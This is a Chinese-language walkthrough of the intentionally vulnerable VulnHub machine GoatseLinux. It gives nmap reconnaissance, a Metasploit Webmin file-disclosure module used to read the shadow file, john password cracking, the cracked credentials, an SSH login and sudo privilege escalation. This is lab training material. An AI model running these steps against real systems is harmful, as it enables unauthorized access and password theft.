一、準備工作
kali和靶機都選擇NAT模式(kali與靶機同網段)
1.靶場環境
下載鏈接:GoatseLinux: 1 ~ VulnHub
2.kali的ip
命令:ifconfig
3.靶機的ip
掃描靶機ip
sudo arp-scan -l
二、信息收集
1.nmap的信息收集
(1)掃描靶機開放的端口及其服務
nmap -A 192.168.101.129
2.網站的信息收集
(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息
http://192.168.101.129
http://192.168.101.129/goatse.html
(2)看看靶機的10000端口
http://192.168.101.129:10000/
這個登錄網頁是基于Web的系統管理工具Webmin,可能從這里尋找突破口
3. msfconsole模塊
1)進入到msf
msfconsole
2)查找webmin可以利用的腳本
search webmin
3)使用該腳本
use auxiliary/admin/webmin/file_disclosure
或者用序號代替
use 1
4)查看需要設置的參數
show options
5)設置RHOSTS(靶機)
set RHOSTS 192.168.101.129
6)使用run開啟攻擊
run
7)將得到的信息放到shadow文件里面
vim shadow
cat shadow
4.john解碼
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
得到了4個密碼用戶
bobby :jpelman
kokomo :jblow
guest:guest
gaping:goatse
三、提權
1.用goatse用戶ssh登錄,
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc goatse@192.168.101.129
因為登錄遠程登錄到系統版本比較老只能采用以上方法登錄
2.sudo提權
sudo -l
gaping
id
sudo su
id